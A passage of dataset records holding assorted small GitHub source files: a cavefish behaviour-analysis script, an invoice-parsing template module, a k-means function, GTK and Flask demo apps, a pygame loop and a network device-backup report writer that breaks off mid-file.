y_coord])\r\n\r\n else:\r\n x_coord = (np.mean(col[i - win_range:i, 0]) +\r\n np.mean(col[i + 1:i + 1 + win_range, 0])) / 2\r\n y_coord = (np.mean(col[i - win_range:i, 1]) +\r\n np.mean(col[i + 1:i + 1 + win_range, 1])) / 2\r\n results.append([x_coord, y_coord])\r\n\r\n return results\r\n\r\n @staticmethod\r\n def _form_helper(val):\r\n val = re.sub(r'[\\s\\[\\]]', '', val)\r\n return val\r\n\r\n def _form_str_cell(self, val):\r\n assert type(val) == str\r\n\r\n if len(val.split(',')) > 1:\r\n tmp = val.split(',')\r\n return np.array([float(self._form_helper(tmp[0])), float(self._form_helper(tmp[1]))])\r\n\r\n else:\r\n form_val = []\r\n tmp = val.split(' ')\r\n for v in tmp:\r\n try:\r\n form_val.append(float(self._form_helper(v)))\r\n except ValueError:\r\n pass\r\n assert len(form_val) == 2\r\n\r\n return np.array(form_val)\r\n\r\n def _convert_source_df(self, in_df):\r\n out_cols = {\"frame_idx\": 'frame_idx',\r\n \"l_filled\": 'l_coords_filled',\r\n \"lhead_l\": 'l_left_head',\r\n \"lhead_r\": 'l_right_head',\r\n \"lhead_c\": 'l_center_head',\r\n \"ltail\": None,\r\n \"lrod\": 'l_rod',\r\n \"r_filled\": 
'r_coords_filled',\r\n \"rhead_l\": 'r_left_head',\r\n \"rhead_r\": 'r_right_head',\r\n \"rhead_c\": 'r_center_head',\r\n \"rtail\": None,\r\n \"rrod\": 'r_rod'}\r\n\r\n # initialize dictionary holding values for out df\r\n out_dict = {}\r\n for col in out_cols.keys():\r\n # tail coordinates are irrelevant\r\n if 'tail' in col:\r\n out_dict[col] = [[0, 0]] * in_df.shape[0]\r\n\r\n # these columns can be copied directly\r\n elif col in ['frame_idx', 'l_filled', 'r_filled']:\r\n out_dict[col] = in_df[out_cols[col]].tolist()\r\n\r\n # everything else needs to be filled in\r\n else:\r\n # might need to work with legacy pandas version, can't call .to_numpy()\r\n col_array = np.array([self._form_str_cell(item)\r\n for item in in_df[out_cols[col]].tolist()])\r\n out_dict[col] = self._roll_mean(col_array)\r\n\r\n return pd.DataFrame.from_dict(out_dict)\r\n\r\n def _add_to_summary_file(self, left_dict, right_dict, fname):\r\n lrow = {\r\n \"Subject\": f\"{fname}_left\",\r\n \"Duration in radius - left-facing\": left_dict[\"in_facing_left\"]\r\n / self.frame_rate,\r\n \"Duration in radius - right-facing\": left_dict[\"in_facing_right\"]\r\n / self.frame_rate,\r\n \"Duration outside radius - left-facing\": left_dict[\"out_facing_left\"]\r\n / self.frame_rate,\r\n \"Duration outside radius - right-facing\": left_dict[\"out_facing_right\"]\r\n / self.frame_rate,\r\n \"Left approaches\": left_dict[\"left_approach\"],\r\n \"Right approaches\": left_dict[\"right_approach\"],\r\n \"Distance traveled (mm)\": left_dict[\"distance\"],\r\n }\r\n\r\n rrow = {\r\n \"Subject\": f\"{fname}_right\",\r\n \"Duration in radius - left-facing\": right_dict[\"in_facing_left\"]\r\n / self.frame_rate,\r\n \"Duration in radius - right-facing\": right_dict[\"in_facing_right\"]\r\n / self.frame_rate,\r\n \"Duration outside radius - left-facing\": right_dict[\"out_facing_left\"]\r\n / self.frame_rate,\r\n \"Duration outside radius - right-facing\": right_dict[\"out_facing_right\"]\r\n / self.frame_rate,\r\n \"Left approaches\": right_dict[\"left_approach\"],\r\n \"Right approaches\": right_dict[\"right_approach\"],\r\n \"Distance traveled (mm)\": right_dict[\"distance\"],\r\n }\r\n\r\n self.sum_file = self.sum_file.append([lrow, rrow], ignore_index=True)\r\n\r\n def analyze_video(self, result_dir):\r\n vid_name = result_dir.split('/')[-2]\r\n if self.frame_file is not None and vid_name not in self.frame_snips.keys():\r\n print(f'Skipped video: {vid_name}')\r\n\r\n else:\r\n src_df = pd.read_csv(result_dir + 'approach_results.csv')\r\n conv_df = self._convert_source_df(src_df)\r\n left_results, right_results = self._get_metrics(\r\n conv_df, result_dir)\r\n\r\n self._add_to_summary_file(\r\n left_results,\r\n right_results,\r\n vid_name,\r\n )\r\n\r\n print(f'Done: {result_dir}')\r\n\r\n\r\nif __name__ == \"__main__\":\r\n parser = argparse.ArgumentParser(\r\n description=\"Backfill& reanalyze cavefish results.\")\r\n\r\n parser.add_argument(\"approach_radius\",\r\n type=int,\r\n help=\"Radius around rod that will be considered as an approach if crossed (in mm).\")\r\n\r\n parser.add_argument(\"--result_folder\",\r\n \"-r\",\r\n type=str,\r\n required=True,\r\n default=None,\r\n help=\"Folder containing results from previously analyzed videos.\")\r\n\r\n parser.add_argument(\"--frame_rate\",\r\n \"-f\",\r\n type=int,\r\n required=False,\r\n default=10,\r\n help=\"Frame rate at which videos were recorded. 
Default is 10.\")\r\n\r\n parser.add_argument(\"--frame_file\",\r\n \"-x\",\r\n type=str,\r\n required=False,\r\n default=None,\r\n help=\"File containing subsections of videos to analyze.\")\r\n\r\n parser.add_argument(\"--window_size\",\r\n \"-w\",\r\n type=int,\r\n required=False,\r\n default=10,\r\n help=\"Rolling window size for filling coordinates. Default is 10.\")\r\n\r\n parser.add_argument(\"--ratio_pixmm\",\r\n \"-r\",\r\n type=float,\r\n required=True,\r\n default=5.287,\r\n help=\"Pixel to millimeter ratio (px/mm).\")\r\n\r\n parser.add_argument(\"--dims_x\",\r\n \"-d\",\r\n type=int,\r\n required=True,\r\n default=1280,\r\n help=\"Original video x-dimensionality in pixels.\")\r\n\r\n usr_args = vars(parser.parse_args())\r\n\r\n filler = BackFiller(**usr_args)\r\n\r\n for vid_path in [f for f in os.listdir(usr_args[\"result_folder\"])]:\r\n if usr_args[\"result_folder\"].endswith(\"/\") or usr_args[\"result_folder\"].endswith(\"\\\\\"):\r\n if os.path.isdir(usr_args[\"result_folder\"][:-1] + \"/\" + vid_path + \"/\"):\r\n filler.analyze_video(\r\n usr_args[\"result_folder\"][:-1] + \"/\" + vid_path + \"/\")\r\n\r\n else:\r\n if os.path.isdir(usr_args[\"result_folder\"][:-1] + \"/\" + vid_path + \"/\"):\r\n filler.analyze_video(\r\n usr_args[\"result_folder\"] + \"/\" + vid_path + \"/\")\r\n\r\n if usr_args[\"result_folder\"].endswith(\"\\\\\") or usr_args[\"result_folder\"].endswith(\"/\"):\r\n filler.sum_file.to_csv(\r\n usr_args[\"result_folder\"] + \"roll_avg_summary_results.csv\", index=False)\r\n\r\n else:\r\n filler.sum_file.to_csv(\r\n usr_args[\"result_folder\"] + \"/roll_avg_summary_results.csv\", index=False)\r\n","repo_name":"Nick-AI/FishProject","sub_path":"slwindow.py","file_name":"slwindow.py","file_ext":"py","file_size_in_byte":25709,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6050590982","text":"from matplotlib import pyplot as plt\nimport os\nfrom sklearn import tree\n\n\nclass Plotter:\n def __init__(self, config):\n self.config = config\n self.plot_dir = config[\"directory\"]\n self.plot_name = \"decision_tree\"\n\n def plot_tree(self, model, feature_names, target_names):\n fig = plt.figure(figsize=(10, 10))\n tree.plot_tree(model, feature_names=feature_names,\n class_names=target_names, filled=True, impurity=True, node_ids=False, proportion=False,\n rounded=True, precision=2)\n plot_file = os.path.join(self.plot_dir, self.plot_name + '.png')\n fig.savefig(plot_file, transparent=False, dpi=300, bbox_inches='tight')\n plt.show()\n","repo_name":"phmelzer/decision-tree-sklearn","sub_path":"src/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26441046530","text":"from appium.webdriver.common.appiumby import By\nfrom time import sleep, time\n\n\nclass Page:\n \"\"\"\n base class for POM mobile testing\n \"\"\"\n webdriver = None\n driver = None\n\n TIMEOUT = 5\n STEPTIME = .5\n\n def __init__(self, driver) -> None:\n self.webdriver = driver\n self.driver = driver.driver\n\n def attribute(self, elem, attrib):\n return elem.get_attribute(attrib)\n\n def sleep(self, timing=None):\n timing_ = .05 if timing is None else timing\n sleep(timing_)\n\n def selectElement(self, elements: list, pattern: dict):\n for element in elements:\n for key in pattern.keys():\n attr = self.attribute(element, key)\n if attr is not None:\n if attr.lower() in pattern[key]:\n return element\n\n 
def fill(self, text: str, input: object = None, xpath: str = None):\n\n        try:\n            input.click()\n            self.sleep()\n            input.send_keys(text)\n            self.driver.hide_keyboard()\n        except Exception:\n            raise Exception(f'Failed to fill the field {input}')","repo_name":"Asidrus/autotest_mobile","sub_path":"pages/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"20423303958","text":"# -*- coding: utf-8 -*-\n\nimport pygame\nimport os\nimport g\nimport widgets\nimport scenes.squirrelton\nimport settings\n\ndef loop():\n\t\"\"\"\n\tThis is the game's main loop and it does the following:\n\t- runs every function in g.pending_actions list and remove it from the list if it returns anything.\n\t- blit the background of menu and main frame\n\t- run the on_loop function and blit the image or animation of every item in g.scene.menu\n\t- run the on_loop function and blit the image or animation of every item in main (main is hardcoded)\n\t- run functions on the following events:\n\t\t- chars begin entrance\n\t\t- chars entering\n\t\t- chars on center\n\t\t- chars begin leaving\n\t\t- chars leaving\n\t- blit messages on their positions\n\t- blit it all on the screen\n\t- blit the balloons on the screen\n\n\tPlease, update the description on every change\n\t\"\"\"\n\tg.milliseconds += g.clock.tick()\n\tif g.milliseconds > settings.fps:\n\t\tg.milliseconds = 0\n\n\t#Runs the main loop\n\t#a pending action only returns true if it should no longer be executed\n\tfor i in g.pending_actions:\n\t\tdone = i()\n\t\tif done:\n\t\t\tg.pending_actions.remove(i)\n\t#reset the frames\n\tg.text_frame.blit(g.text_background, (0,0))\n\tg.menu_frame.blit(g.menu_background, (0,0))\n\t\t\n\t#run the menu items\n\tfor i in g.scene.menu:\n\t\ti.on_loop()\n\t\tif i.__class__ == widgets.Button:\n\t\t\tg.menu_frame.blit(i.background, i.pos,(i.area[i.status],(264,66)))\n\t\tg.menu_frame.blit(i.image,i.pos)\n\t#run items in main frame\n\tfor i in (g.next_scene, g.scene):\n\t\tif i and i.place:\n\t\t\ti.place.on_loop()\n\t\t\tg.main_frame.blit(i.place.animation, i.place.pos, ((i.place.step,0), i.place.size))\n\tfor i in (g.PC, g.foe):\n\t\tif i:\n\t\t\ti.on_loop()\n\t\t\tg.main_frame.blit(i.animation, i.pos,((i.step,0),i.size))\n\tfor i in (g.PC, g.foe):\n\t\tif i and i.chosen_bobot:\n\t\t\ti.chosen_bobot.on_loop()\n\t\t\tg.main_frame.blit(i.chosen_bobot.animation, i.chosen_bobot.pos,(i.chosen_bobot.step, i.chosen_bobot.size))\n\tif g.panel:\n\t\tpanel=g.panel\n\t\tpanel.on_loop()\n\t\tg.main_frame.blit(panel.image, panel.pos)\n\n\tif g.PC:\n\t\tg.menu_frame.blit(g.PC.status, (10,10))\n\t\tif g.PC.pos[0]<=-100 and g.PC.side == 'left':\n\t\t\tg.scene.on_start_enter()\n\t\telif g.PC.pos[0] > -100 and g.PC.animation == g.PC.walk:\n\t\t\tg.scene.on_entering()\n\t\telif g.on_center:\n\t\t\tg.scene.on_center()\n\t\telif g.PC.pos[0] < 180 and g.PC.animation == g.PC.walk:\n\t\t\tg.scene.on_start_leave()\n\n\tg.board.on_loop()\n\tfor (p,i) in zip(g.slots, [i for sub in g.board.messages for i in sub] ):\n\t\tg.text_frame.blit(i,(35,p))\n\t\n\tg.screen.blit(g.main_frame,g.main_pos)\n\tg.screen.blit(g.text_frame,g.text_pos)\n\tg.screen.blit(g.menu_frame,g.menu_pos)\n\tif g.board.side == 'none':\n\t\tboard_pos = (20,355)\n\telse:\n\t\tboard_pos = (20,265)\n\tg.screen.blit(g.board.balloons[g.board.side], board_pos)\n\tfor i in g.board.headline:\n\t\tg.screen.blit(i, (30, 360)) \n\ndef teste():\n\tpass\n\ndef speak_on_center(char, line):\n\tif (180 
> char.pos[0] > 169 and char.side == 'left') \\\n\tor (320 > char.pos[0] > 301 and char.side == 'right'):\n\t\tg.board.new_message(line)\n\n\t\n","repo_name":"ocastudios/bobots","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":2974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"9294768580","text":"#solution 1\n#secret_name = 9\n\n#for i in range(3):\n#    shot = input('Guess: ')\n#    if secret_name == int(shot):\n#        print('You win!')\n#        break\n#    elif secret_name != int(shot):\n#        i += 1\n#if i >= 3:\n#    print('You lose!')\n\n# solution 2\nsecret_number = 9\nguessing_number = 0 \nguessing_limit = 3\nwhile guessing_number < guessing_limit:\n    guess = int(input('Guess: '))\n    guessing_number += 1\n    if guess == secret_number:\n        print('you won!')\n        \n        break\nelse:\n    print(\"you have failed!\")","repo_name":"Usserski/starting_python","sub_path":"Learning Basic/guessing_game.py","file_name":"guessing_game.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"40596988614","text":"\"\"\"\nThis module abstracts templates for invoice providers.\n\nTemplates are initially read from .yml files and then kept as a class.\n\"\"\"\n\nimport yaml\nimport os\nimport re\nimport dateparser\nfrom unidecode import unidecode\nimport logging as logger\nfrom collections import OrderedDict\n\nfrom invoice2data.utils import ordered_load\n\nOPTIONS_DEFAULT = {\n    'remove_whitespace': False,\n    'remove_accents': False,\n    'lowercase': False,\n    'currency': 'EUR',\n    'date_formats': [],\n    'languages': [],\n    'decimal_separator': '.',\n    'replace': [], # example: see templates/fr/fr.free.mobile.yml\n    'field_separator': r'\\s+',\n    'line_separator': r'\\n',\n}\n\ndef read_templates(folder):\n    \"\"\"\n    Load yaml templates from template folder. Return list of dicts.\n    \"\"\"\n    output = []\n    for path, subdirs, files in os.walk(folder):\n        for name in sorted(files):\n            if name.endswith('.yml'):\n                tpl = ordered_load(open(os.path.join(path, name)).read())\n                tpl['template_name'] = name\n\n                # Test if all required fields are in template:\n                assert 'keywords' in tpl.keys(), 'Missing keywords field.'\n                required_fields = ['date', 'amount', 'invoice_number']\n                assert len(set(required_fields).intersection(tpl['fields'].keys())) == len(required_fields), \\\n                    'Missing required key in template {} {}. 
Found {}'.format(name, path, tpl['fields'].keys())\n\n                # Keywords as list, if only one.\n                if type(tpl['keywords']) is not list:\n                    tpl['keywords'] = [tpl['keywords']]\n\n                if 'lines' in tpl:\n                    assert 'start' in tpl['lines'], 'Lines start regex missing'\n                    assert 'end' in tpl['lines'], 'Lines end regex missing'\n                    assert 'line' in tpl['lines'], 'Line regex missing'\n\n                output.append(InvoiceTemplate(tpl))\n    return output\n\n\nclass InvoiceTemplate(OrderedDict):\n    \"\"\"\n    Represents single template files that live as .yml files on the disk.\n    \"\"\"\n\n    def __init__(self, *args, **kwargs):\n        super(InvoiceTemplate, self).__init__(*args, **kwargs)\n\n        # Merge template-specific options with defaults\n        self.options = OPTIONS_DEFAULT.copy()\n\n        if 'options' in self:\n            self.options.update(self['options'])\n\n        for lang in self.options['languages']:\n            assert len(lang) == 2, 'lang code must have 2 letters'\n\n        # Set issuer, if it doesn't exist.\n        if 'issuer' not in self.keys():\n            self['issuer'] = self['keywords'][0]\n\n    def prepare_input(self, extracted_str):\n        \"\"\"\n        Input raw string and do transformations, as set in template file.\n        \"\"\"\n\n        # Remove whitespace\n        if self.options['remove_whitespace']:\n            optimized_str = re.sub(' +', '', extracted_str)\n        else:\n            optimized_str = extracted_str\n\n        # Remove accents\n        if self.options['remove_accents']:\n            optimized_str = unidecode(optimized_str)\n\n        # convert to lower case\n        if self.options['lowercase']:\n            optimized_str = optimized_str.lower()\n\n        # specific replace\n        for replace in self.options['replace']:\n            assert len(replace) == 2, 'A replace should be a list of 2 items'\n            optimized_str = optimized_str.replace(replace[0], replace[1])\n\n        return optimized_str\n\n    def matches_input(self, optimized_str):\n        \"\"\"See if string matches keywords set in template file\"\"\"\n\n        if all([keyword in optimized_str for keyword in self['keywords']]):\n            logger.debug('Matched template %s', self['template_name'])\n            return True\n\n    def parse_number(self, value):\n        assert value.count(self.options['decimal_separator']) < 2,\\\n            'Decimal separator cannot be present several times'\n        # replace decimal separator by a |\n        amount_pipe = value.replace(self.options['decimal_separator'], '|')\n        # remove all possible thousands separators\n        amount_pipe_no_thousand_sep = re.sub(\n            '[.,\\s]', '', amount_pipe)\n        # put dot as decimal sep\n        return float(amount_pipe_no_thousand_sep.replace('|', '.'))\n\n    def parse_date(self, value):\n        res = dateparser.parse(\n            value, date_formats=self.options['date_formats'],\n            languages=self.options['languages'])\n        logger.debug(\"result of date parsing=%s\", res)\n        return res\n\n    def coerce_type(self, value, target_type):\n        if target_type == 'int':\n            if not value.strip():\n                return 0\n            return int(self.parse_number(value))\n        elif target_type == 'float':\n            if not value.strip():\n                return 0.0\n            return float(self.parse_number(value))\n        elif target_type == 'date':\n            return self.parse_date(value)\n        assert False, 'Unknown type'\n\n    def extract(self, optimized_str):\n        \"\"\"\n        Given a template file and a string, extract matching data fields.\n        \"\"\"\n\n        logger.debug('START optimized_str ========================')\n        logger.debug(optimized_str)\n        logger.debug('END optimized_str ==========================')\n        logger.debug(\n            'Date parsing: languages=%s date_formats=%s',\n            self.options['languages'], self.options['date_formats'])\n        logger.debug('Float parsing: decimal separator=%s', self.options['decimal_separator'])\n        logger.debug(\"keywords=%s\", self['keywords'])\n        
logger.debug(self.options)\n\n        # Try to find data for each field.\n        output = {}\n        output['issuer'] = self['issuer']\n        \n        for k, v in self['fields'].items():\n            if k.startswith('static_'):\n                logger.debug(\"field=%s | static value=%s\", k, v)\n                output[k.replace('static_', '')] = v\n            else:\n                logger.debug(\"field=%s | regexp=%s\", k, v)\n\n                # Fields can have multiple expressions\n                if type(v) is list:\n                    for v_option in v:\n                        res_find = re.findall(v_option, optimized_str)\n                        if res_find:\n                            break\n                else:\n                    res_find = re.findall(v, optimized_str)\n                if res_find:\n                    logger.debug(\"res_find=%s\", res_find)\n                    if k.startswith('date') or k.endswith('date'):\n                        output[k] = self.parse_date(res_find[0])\n                        if not output[k]:\n                            logger.error(\n                                \"Date parsing failed on date '%s'\", res_find[0])\n                            return None\n                    elif k.startswith('amount'):\n                        output[k] = self.parse_number(res_find[0])\n                    else:\n                        output[k] = res_find[0]\n                else:\n                    logger.warning(\"regexp for field %s didn't match\", k)\n\n        if 'lines' in self:\n            self.extract_lines(optimized_str, output)\n\n        output['currency'] = self.options['currency']\n\n        if len(output.keys()) >= 5:\n            output['desc'] = 'Invoice %s from %s' % (\n                output['invoice_number'], self['issuer'])\n            logger.debug(output)\n            return output\n        else:\n            logger.error(output)\n            return None\n\n    def extract_lines(self, content, output):\n        \"\"\"Try to extract lines from the invoice\"\"\"\n        start = re.search(self['lines']['start'], content)\n        end = re.search(self['lines']['end'], content)\n        if not start or not end:\n            logger.warning('no lines found - start %s, end %s', start, end)\n            return\n        content = content[start.end():end.start()]\n        lines = []\n        current_row = {}\n        if 'first_line' not in self['lines'] and\\\n                'last_line' not in self['lines']:\n            self['lines']['first_line'] = self['lines']['line']\n        for line in re.split(self.options['line_separator'], content):\n            # if the line has empty lines in it, skip them\n            if not line.strip('').strip('\\n') or not line:\n                continue\n            if 'first_line' in self['lines']:\n                match = re.search(self['lines']['first_line'], line)\n                if match:\n                    if 'last_line' not in self['lines']:\n                        if current_row:\n                            lines.append(current_row)\n                        current_row = {}\n                    if current_row:\n                        lines.append(current_row)\n                    current_row = {\n                        field: value.strip() if value else ''\n                        for field, value in match.groupdict().items()\n                    }\n                    continue\n            if 'last_line' in self['lines']:\n                match = re.search(self['lines']['last_line'], line)\n                if match:\n                    for field, value in match.groupdict().items():\n                        current_row[field] = '%s%s%s' % (\n                            current_row.get(field, ''),\n                            current_row.get(field, '') and '\\n' or '',\n                            value.strip() if value else ''\n                        )\n                    if current_row:\n                        lines.append(current_row)\n                    current_row = {}\n                    continue\n            match = re.search(self['lines']['line'], line)\n            if match:\n                for field, value in match.groupdict().items():\n                    current_row[field] = '%s%s%s' % (\n                        current_row.get(field, ''),\n                        current_row.get(field, '') and '\\n' or '',\n                        value.strip() if value else ''\n                    )\n                continue\n            logger.debug(\n                'ignoring *%s* because it doesn\\'t match anything', line\n            )\n        if current_row:\n            lines.append(current_row)\n\n        types = self['lines'].get('types', [])\n        for row in lines:\n            for name in row.keys():\n                if name in types:\n                    row[name] = self.coerce_type(row[name], types[name])\n\n        if lines:\n            output['lines'] = 
lines\n","repo_name":"dhanya1/Automation-with-Pyautogui","sub_path":"invoices/invoice2data/invoice2data/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":10426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37060117366","text":"#!/usr/bin/env python3\n\"\"\"Contains the function kmeans()\"\"\"\n\nimport numpy as np\n\n\ndef kmeans(X, k, iterations=1000):\n \"\"\"Performs K-means on a dataset\n\n Args:\n X (ndarray)(n,d): contains dataset\n n: no. data points\n d: no. dimensions for each data point\n k (int): positive int containing no. clusters\n iterations (int): number of iterations that should be performed\n\n Returns:\n C, clss\n C (ndarray)(k,d): contains the centroid means for each cluster\n clss (ndarray)(n,): contains index of the cluster C that each data\n point belongs to\n None, None if failure\n \"\"\"\n if type(X) is not np.ndarray or len(X.shape) != 2:\n return None, None\n if type(k) is not int or k <= 0 or k > X.shape[0]:\n return None, None\n if type(iterations) is not int or iterations <= 0:\n return None, None\n\n n, d = X.shape\n\n low = np.min(X, axis=0)\n high = np.max(X, axis=0)\n centroids = np.random.uniform(low=low, high=high, size=(k, d))\n\n for i in range(iterations):\n distances = np.sqrt(((X - centroids[:, np.newaxis])**2).sum(axis=2))\n clss = np.argmin(distances, axis=0)\n prev = centroids.copy()\n for j in range(k):\n if len(X[j == clss]) == 0:\n centroids[j] = np.random.uniform(low=np.min(X, axis=0),\n high=np.max(X, axis=0),\n size=(1, d))\n else:\n centroids[j] = np.mean(X[j == clss], axis=0)\n if np.array_equal(prev, centroids):\n break\n\n distances = np.sqrt(((X - centroids[:, np.newaxis])**2).sum(axis=2))\n clss = np.argmin(distances, axis=0)\n\n return centroids, clss\n","repo_name":"kyle-gross/holbertonschool-machine_learning","sub_path":"unsupervised_learning/0x01-clustering/1-kmeans.py","file_name":"1-kmeans.py","file_ext":"py","file_size_in_byte":1800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17003571581","text":"#!/usr/bin/env python\nfrom urllib.request import urlopen\nimport sys,json\n\nMSD_git_url = \"https://raw.githubusercontent.com/ModelSEED/ModelSEEDDatabase/\"\nMSD_commit = \"v1.0\"\n\n##\n## Compounds\n##\nfile = urlopen(MSD_git_url+MSD_commit+\"/Biochemistry/Structures/Unique_ModelSEED_Structures.txt\")\ninchi_structures=dict()\ninchikey_structures=dict()\n\nfor line in file.readlines():\n line=line.decode('utf-8')\n line=line.strip('\\n')\n array=line.split('\\t')\n if(array[1] == 'InChI'):\n inchi_structures[array[0]]=array[5]\n if(array[1] == 'InChIKey'):\n inchikey_structures[array[0]]=array[5]\n \nwith open('Compound_Structures.json','w') as inchi_file:\n inchi_file.write(json.dumps(inchi_structures))\n\nwith open('Inchikey_IDs.json','w') as inchikey_file:\n inchikey_file.write(json.dumps(inchikey_structures))\n","repo_name":"kbaseapps/CompoundSetUtils","sub_path":"data/Fetch_Updated_Data_from_ModelSEED.py","file_name":"Fetch_Updated_Data_from_ModelSEED.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37438638090","text":"import gi\n\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\nclass MyApp(Gtk.Window):\n\n def __init__(self):\n super().__init__(title=\"Multi-page Application\")\n self.set_default_size(1000, 800)\n\n # Create navigation bar\n 
self.navbar = Gtk.Box(spacing=10)\n self.back_button = Gtk.Button(label=\"Back\")\n self.back_button.set_sensitive(False)\n self.back_button.connect(\"clicked\", self.on_back_clicked)\n self.next_button = Gtk.Button(label=\"Next\")\n self.next_button.connect(\"clicked\", self.on_next_clicked)\n self.navbar.pack_start(self.back_button, False, True, 0)\n self.navbar.pack_end(self.next_button, False, True, 0)\n\n # Create stack for pages\n self.stack = Gtk.Stack()\n self.current_page = 1\n\n # Create page 1\n page1 = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=10)\n label1 = Gtk.Label(label=\"Page 1\")\n label1.set_halign(Gtk.Align.CENTER)\n confirm_button = Gtk.Button(label=\"Confirm\")\n confirm_button.connect(\"clicked\", self.on_confirm_clicked)\n page1.pack_start(label1, True, True, 0)\n page1.pack_start(confirm_button, True, True, 0)\n self.stack.add_named(page1, \"page1\")\n\n # Create page 2\n page2 = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=10)\n label2 = Gtk.Label(label=\"Page 2\")\n label2.set_halign(Gtk.Align.CENTER)\n done_button = Gtk.Button(label=\"Done\")\n done_button.connect(\"clicked\", Gtk.main_quit)\n page2.pack_start(label2, True, True, 0)\n page2.pack_start(done_button, True, True, 0)\n self.stack.add_named(page2, \"page2\")\n\n # Add stack and navbar to window\n vbox = Gtk.Box(orientation=Gtk.Orientation.VERTICAL, spacing=10)\n vbox.pack_start(self.navbar, False, True, 0)\n vbox.pack_start(self.stack, True, True, 0)\n self.add(vbox)\n\n # Show initial page\n self.stack.set_visible_child_name(f\"page{self.current_page}\")\n\n def on_back_clicked(self, button):\n if self.current_page > 1:\n self.current_page -= 1\n self.stack.set_visible_child_name(f\"page{self.current_page}\")\n self.update_button_states()\n\n def on_next_clicked(self, button):\n if self.current_page < 2:\n self.current_page += 1\n self.stack.set_visible_child_name(f\"page{self.current_page}\")\n self.update_button_states()\n\n def on_confirm_clicked(self, button):\n self.current_page = 2\n self.stack.set_visible_child_name(f\"page{self.current_page}\")\n self.update_button_states()\n\n def update_button_states(self):\n self.back_button.set_sensitive(self.current_page > 1)\n self.next_button.set_sensitive(self.current_page < 2)\n\nwindow = MyApp()\nwindow.show_all()\nGtk.main()","repo_name":"arunnats/Hardening-GUI-for-Ubuntu-Debian","sub_path":"pages.py","file_name":"pages.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28406029603","text":"from flask import Flask, render_template, request, url_for, redirect, render_template_string\nfrom flask_cors import CORS\nfrom app import SpeechText\nfrom pydub import AudioSegment\nfrom whisper import load_model, transcribe\nimport torch, io, os\n\napp = Flask(__name__)\napp.secret_key = 'John The Ripper'\nYOUTUBE_LINK = ''\nVALID_INVALID_CHECK = False\nAUDIO_FILE_PATH = ''\nAUDIO_FILE_NAME_ = 'audioFileFromUser.mp3'\n\n@app.route('/')\ndef home():\n return render_template('index.html')\n\n@app.route('/', methods=['GET', 'POST'])\ndef currentTemp():\n if request.method == 'POST':\n # Check for valid input from user in link field or file input field \n if not (request.form.get('linkToVideo') or request.files.get('file')):\n return redirect(url_for('home')) \n else:\n if request.form.get('linkToVideo'): # if user entered link \n # checking whether the url given by the user is youtube video link or not\n YOUTUBE_LINK = 
request.form.get('linkToVideo')\n VALID_INVALID_CHECK = SpeechText.is_valid_youtube_url(YOUTUBE_LINK)\n # linkUrl = request.form['linkToVideo']\n if not VALID_INVALID_CHECK:\n return redirect(url_for('home'))\n \n # Now let's download the youtube video from the link specified by the user\n AUDIO_FILE_PATH = SpeechText.youtubeVideoToAudioDownload(YOUTUBE_LINK)\n \n # speech conversion\n elif request.files.get('file'): # if user uploaded an audio file\n \n wavFile = request.files['file']\n AUDIO_FILE_PATH = os.path.join(\".\\\\audio_files\", AUDIO_FILE_NAME_)\n filename = wavFile.filename \n wavFile.save(AUDIO_FILE_PATH)\n \n try:\n lang = request.form.get('val')\n convertedText = SpeechText._TextFromSpeech(AUDIO_FILE_PATH, lang)\n if convertedText[0] != False: \n return redirect(url_for('home'))\n return render_template('index.html', convertedText=convertedText[1]) # Print the output \n except Exception as e:\n pass\n return \"Error\"\n\nif __name__ == '__main__':\n app.run(port=5000, debug=True)\n","repo_name":"Tweaks016/speech-to-text-whisper","sub_path":"mainApp.py","file_name":"mainApp.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41774554945","text":"def writeToFile(*, blocked, timedOut, badAuth, commits):\r\n # Define the HTML document\r\n html = \"\"\"\\\r\n
\r\n

Device Backup

\r\n

If a host appears under \"Blocked\", this host actively denied an SSH connection. Check firewall policies and local SSH access rules.

\r\n

If a host appears under \"Timed Out\", this host simply timed out and was either dropped by a firewall policy, or simply offline at the time of execution.

\r\n

If a host appears under \"Authentication Failed\", the backup job does not have the correct credentials for the device.

\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \"\"\"\r\n\r\n for i in range(max(len(blocked), len(timedOut), len(badAuth))):\r\n try:\r\n html += \"\"\r\n html += \"\" \r\n html += \"\" \r\n except IndexError:\r\n html += \"\"\r\n if i >= len(blocked):\r\n if i < len(timedOut) and i < len(badAuth):\r\n html += \"\"\r\n html += \"\"\r\n elif i < len(timedOut) and i >= len(badAuth):\r\n html += \"\"\r\n html += \"\"\r\n elif i >= len(timedOut) and i < len(badAuth):\r\n html += \"\"\r\n html += \"\"\r\n elif i >= len(timedOut):\r\n if i < len(badAuth):\r\n html += \"\"\r\n else:\r\n html += \"\"\r\n finally:\r\n html += \"\"\r\n\r\n html += \"\"\"\\\r\n
\r\n Blocked\r\n \r\n Timed Out\r\n \r\n Authentication Failed\r\n
